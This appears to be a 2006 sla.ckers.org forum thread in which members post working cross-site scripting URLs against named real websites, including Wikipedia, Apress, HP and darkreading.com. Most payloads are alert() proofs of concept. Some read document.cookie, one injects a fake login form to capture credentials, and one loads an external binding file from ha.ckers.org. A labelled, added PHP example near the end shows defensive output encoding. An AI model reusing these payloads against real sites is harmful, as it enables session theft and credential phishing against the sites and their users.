Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: digi7al64
Date: November 09, 2006 11:32PM

maluc Wrote:
-------------------------------------------------------
> haxxed without even trying.. >.>
> http://www.hackersafe.com/error/msg.jsp?msg=Haxxored
>
> -maluc

lmfao

- so who here wants to create a new company with me called "HackerProof".



Business Model
Basically what we will do is offer a gif for commercial websites @ $5000 a year ($7500 for an animated version). For that you get to go into our "hacker proof" directory listing of "safe" sites.

How it works
> Our highly accurate smart deduction engine scans your website in real time... in fact in 6 out of 10 tests we can actually deduce whether you are using asp, php, aspx, jsp or even cfm.

> The HackerProof vulnerability knowledge module is a self aware emotional system with over 70 million unique vulnerabilities contained within its reasoning logic function. In fact it is so smart that it creates over 7000 new vulnerabilities every single day.

> The HackerProof non-intrusive website audits will not affect your webserver or its performance at all. In fact our audits are so non intrusive that a log file examination wouldn't even find any trace of us.


So who is with me? i would suggest you get in before we release the IPO!

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: jungsonn
Date: November 10, 2006 01:05AM

Haha that's great!

Re: So it begins
Posted by: fogez
Date: November 10, 2006 10:57AM

Sla.ckers.org partners with http://www.bk.com/history.aspx?PageTitle=With%20a%20side%20of%20Sla.ckers.org%22);alert('xss');test=(%22

Re: So it begins
Posted by: fogez
Date: November 10, 2006 11:52AM

Broken filter that you can escape the escapes...

http://www.clickapps.com/search_results.htm?searchterm=\\\'\%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Ca=\%22&PHPSESSID=c5304cc93b166333aa6890e45d304117%3Cxss='

Re: So it begins
Posted by: alf
Date: November 10, 2006 12:26PM

XSS @ "Freundeskreis Halbe" a German Right - Wing Connection and with that i mean they're fuckin nazis shame on my country, i did the xss without proxy so its ur turn now ..

http://www.fkhalbe.net/gbuch/guestbook_changeentry.php?entry=%22%3Ch2%3Eomgwtfxss%3C/h2%3E

Re: So it begins
Posted by: jungsonn
Date: November 10, 2006 06:07PM

Quote

i did the xss without proxy so its ur turn now ..

done.

Re: So it begins
Posted by: alf
Date: November 11, 2006 03:59PM

http://db.ard.de/abc/CG.suchausgabe?p_buchstabe='%22%3C/title%3E%3Cscript%3Ealert(123)%3C/script%3E

Re: So it begins
Posted by: alf
Date: November 11, 2006 04:15PM

http://www.turkishdailynews.com.tr/article.php?enewsid=58929%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Re: So it begins
Posted by: rsnake
Date: November 12, 2006 01:06AM

http://www.ufc.com/index.cfm?fa=search.results&ss=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: mesca
Date: November 12, 2006 11:34AM

First post on this board.

http://fr.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://nl.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://ru.wikipedia.org/wiki/Special:Search?search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go

Expect this to be fixed shortly.

– mesca
« Reality is merely an illusion, albeit a very persistent one. » – Albert Einstein

Re: So it begins
Posted by: rsnake
Date: November 12, 2006 12:54PM

Nice post, mesca! I'm a little surprised no one else found it first.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: November 12, 2006 12:55PM

ya, it is.. i never bothered to check the other languages of wiki sites.. although i'm sure i checked the en.wiki one a while back

good job

-maluc

Re: So it begins
Posted by: alf
Date: November 12, 2006 02:03PM

some fresh ones for the relaunch of my homepage:

http://www.wintotal.de/User/LogInOut.php?URL='%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://leaguez.yusho.de/?module=news'%22%3Cscript%3Ealert(123)%3C/script%3E
http://www.MAN.de/index.php?id=520&tx_ttnews[tt_news]=1585&tx_ttnews[backPid]=262'%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://www.genomics.sinica.edu.tw/index.php?t=13'%22%3E%3Cscript%3Ealert(123)%3C/script%3E&article_id=44
http://instantcontent.freenet.de/content.php?templ=1&Cat_id=9&design_id=4&FarbeTitel=FFFFFF&HFarbeTitel=3366FF&FarbeHeadlines=000099&HFarbeHeadlines=CCCCFF%3Ci%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/i%3E%3Cbr%3E&FarbeRahmen=3366FF&Anzahl=5
http://www.counter-strike.de/content/cs16/spraylogos/index.php?seite=2'%22%3Cscript%3Ealert(123)%3C/script%3E
http://www.cs-expert.de/cse_user_profil.php?m_id=1%22%3Cscript%3Ealert(123)%3C/script%3E
http://www.planet.com.tw/product/product_dm.php?product_id=267&menu_id=15'%22%3E%3Cscript%3Ealert(123)%3C/script%3E

Re: So it begins
Posted by: mesca
Date: November 12, 2006 04:37PM

alf,

> http://www.MAN.de [broken link]

Funny, I was auditing a Typo3 website last month for a big company and found a lot of issues around this tt_news module.

Hint: there are also some problems with Typo3 core and some other modules. I signed a non-disclosure agreement so I can't tell you what they are. At least, you know there are more issues on Typo3! Have fun :)

– mesca
« Reality is merely an illusion, albeit a very persistent one. » – Albert Einstein

Re: So it begins
Posted by: WhiteAcid
Date: November 12, 2006 05:18PM

There's not many of these, this one requires forging the referer hence using flash and it being IE only: http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&referer=<script>alert(1337)</script>
Same site, more normal XSS: http://www.hackr.org/users.php?user=blasterX13%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 11/12/2006 05:31PM by WhiteAcid.

Re: So it begins
Posted by: Spikeman
Date: November 13, 2006 01:12AM

rsnake Wrote:
-------------------------------------------------------
> Did you know that XSS is in the dictionary?
> http://dictionary.reference.com/browse/';alert('XSS%20n.%20to%20haX0r')//

http://dictionary.reference.com/search?q=%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss');xx:expression(alert('IE%20SUX..%20get%20firefox!'))%22%20%20xss=%22

You can even inject stuff into the meta-tags! (I will also post this in the redirects thread):

http://dictionary.reference.com/browse/0;url=http://google.com%22%20http-equiv=%22refresh%22%20xss=%22

Re: So it begins
Posted by: xknown
Date: November 13, 2006 09:40AM

Hi, this is my first post

apress: http://www.apress.com/ecommerce/cart.html/'%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C

Re: So it begins
Posted by: alf
Date: November 13, 2006 09:41AM

mesca Wrote:
-------------------------------------------------------
> alf,
>
> > http://www.MAN.de
>
> Funny, I was auditing a Typo3 website last month
> for a big company and found a lot of issues around
> this tt_news module.
>
> Hint: there are also some problems with Typo3 core
> and some other modules. I signed a non-disclosure
> agreement so I can't tell you what they are. At
> least, you know there are more issues on Typo3!
> Have fun :)

ah yes, i've found some in the past ( one @ gulli.com ;) ) and yeh that would be great but that's not my main aim. I just want to gather as many "sounding" names of German companies etc. in my xss list, (tv companies, car manufacturers, shop systems and stuff like that) then tell them they should fix this ^.^

Re: So it begins
Posted by: maluc
Date: November 13, 2006 11:04AM

welcome to the boards xknown ^^

-maluc

Re: So it begins
Posted by: xknown
Date: November 13, 2006 01:52PM

Thanks maluc :)

More on apress
apress search: http://www.apress.com/book/search.html/'%22%3Cscript%3Ealert('XSS')%3C/script%3E%3C
apress newsletter: http://www.apress.com/newsletter/subscribe.html/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

Re: So it begins
Posted by: godspeedsc5
Date: November 13, 2006 02:21PM

Hi, I'm new here and this is my first post - hopefully I'm doing this right and these aren't dupes.


Re: So it begins
Posted by: id
Date: November 13, 2006 04:14PM

Welcome to the site guys.

-id

Re: So it begins
Posted by: digi7al64
Date: November 13, 2006 11:14PM

http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22DIGI7AL64%22%29%3E << Not a redirect (WhiteAcid you have a vun... \0/ for me)

http://msgs.securepoint.com/cgi/AT-sp-search?sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%21%23%24%25%26%28%29*%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E

both only firefox though i assume with a little bit of work you could get ie to fire a vun or 2.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: maluc
Date: November 14, 2006 12:01AM

heh, giving whiteacid extra work to do :T

and they'll both work in IE if you only use onload=alert rather than onload!@#$%^=alert

http://msgs.securepoint.com/cgi/AT-sp-search?sp=sp&db=bugtraq&search=%22%3E%3CBODY+onload%3Dalert%28%22XSS%22%29%3E%3Cx

for whiteacid you also have to escape the object tag with </object>

http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://www.hackr.org/yourinfo.php&sp=sp&db=bugtraq&search=%22%3E%3C/object%3E%3CBODY+onload%3Dalert%28%22DIGI7AL64%22%29%3E%3Cx

-maluc



Edited 1 time(s). Last edit at 11/14/2006 12:02AM by maluc.

Re: So it begins
Posted by: maluc
Date: November 14, 2006 02:07AM

http://hp.infonow.net/bin/findNow?CLIENT_ID=HP_LOC_CAN_SRV&PAGE=SearchFinal.html&PROD_DESC_NUM=6&HIDDEN_TIER_2_TEXT=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Re: So it begins
Posted by: WhiteAcid
Date: November 14, 2006 05:37AM

Thanks for those guys. Well done. I've done echo htmlentities($vars, ENT_QUOTES); now instead of just echo $vars;.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer
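
The change WhiteAcid describes, as an added example that is not part of the original thread or of WhiteAcid's script: one constructed value is placed in single- and double-quoted attributes under plain echo, htmlentities() with ENT_COMPAT (the default before PHP 8.1) and htmlentities() with ENT_QUOTES, and the output is parsed to see whether the attribute came through intact. The helper names h() and parsed_attributes() and the sample value are assumptions.

```php
<?php
// Added example: helper names are hypothetical, the input is constructed.

/** Encode a request-derived value for HTML body or quoted-attribute output. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and '; the charset is stated explicitly.
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Put $encoded inside a quoted attribute and return the attributes a parser sees. */
function parsed_attributes(string $encoded, string $quote): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // fragments trigger parser warnings
    $doc->loadHTML('<input value=' . $quote . $encoded . $quote . '>');
    libxml_clear_errors();

    $seen = [];
    foreach ($doc->getElementsByTagName('input') as $el) {
        foreach ($el->attributes as $attr) {
            $seen[$attr->nodeName] = $attr->nodeValue;
        }
    }
    return $seen;
}

// Constructed stand-in for a query parameter or Referer header value.
$value = "x' data-a='1\" data-b=\"2";

$variants = [
    'echo $vars' => $value,
    'ENT_COMPAT' => htmlentities($value, ENT_COMPAT, 'UTF-8'),
    'ENT_QUOTES' => h($value),
];

foreach (["'", '"'] as $quote) {
    foreach ($variants as $label => $encoded) {
        $attrs = parsed_attributes($encoded, $quote);
        // Intact: one attribute only, and it decodes back to the original input.
        $intact = ($attrs === ['value' => $value]);
        printf("value=%s...%s  %-11s %s\n", $quote, $quote, $label,
            $intact ? 'intact' : 'extra attributes parsed');
    }
}
```

Entity encoding of this kind covers HTML body and quoted-attribute output only; values written into script blocks, URLs or unquoted attributes need encoding for that context instead.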

Re: So it begins
Posted by: fogez
Date: November 14, 2006 07:44AM

A double whammy for Darkreading...

URL redirection and XSS (this example inserts a new login form and hides the others)

http://www.darkreading.com/login.asp?start=yes&nexturl=http%3A%2F%2Fwww%2Esla.ckers.org%2Ecom&webinar_id=&errStr=%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cform%20action=%22login_action.asp%22%20method=%22POST%22%3E%3Cinput%20type=%22hidden%22%3E%3Ctable%20cellpadding=%228%22%3E%3Ctr%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cb%3EUsername%3C/b%3E%3C/font%3E%3C/td%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cinput%20type=%22text%22%20name=%22usr_username%22%20size=%2220%22%20value=%22%22%3E%3C/font%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cb%3EPassword%3C/b%3E%3C/font%3E%3C/td%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cinput%20type=%22password%22%20name=%22usr_password%22%20size=%2220%22%20value=%22%22%3E%3C/font%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cb%3E%3C/b%3E%3C/font%3E%3C/td%3E%3Ctd%3E%3Cfont%20size=%22-1%22%3E%3Cinput%20type=%22submit%22%20name=%22action%22%20value=%22Login%22%3E%3C/font%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C!--

Re: So it begins
Posted by: godspeedsc5
Date: November 14, 2006 10:11AM


Re: So it begins
Posted by: mesca
Date: November 14, 2006 10:25AM

They "fixed" the Wikipedia XSS, and the developers even complain about poorly designed js scripts: http://bugzilla.wikipedia.org/show_bug.cgi?id=7888

But wait, did I say they repaired their code?

Reloaded:
http://fr.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://nl.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go
http://ru.wikipedia.org/wiki/Special:Search?search=%22%3C%3E%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go=Go

– mesca
« Reality is merely an illusion, albeit a very persistent one. » – Albert Einstein
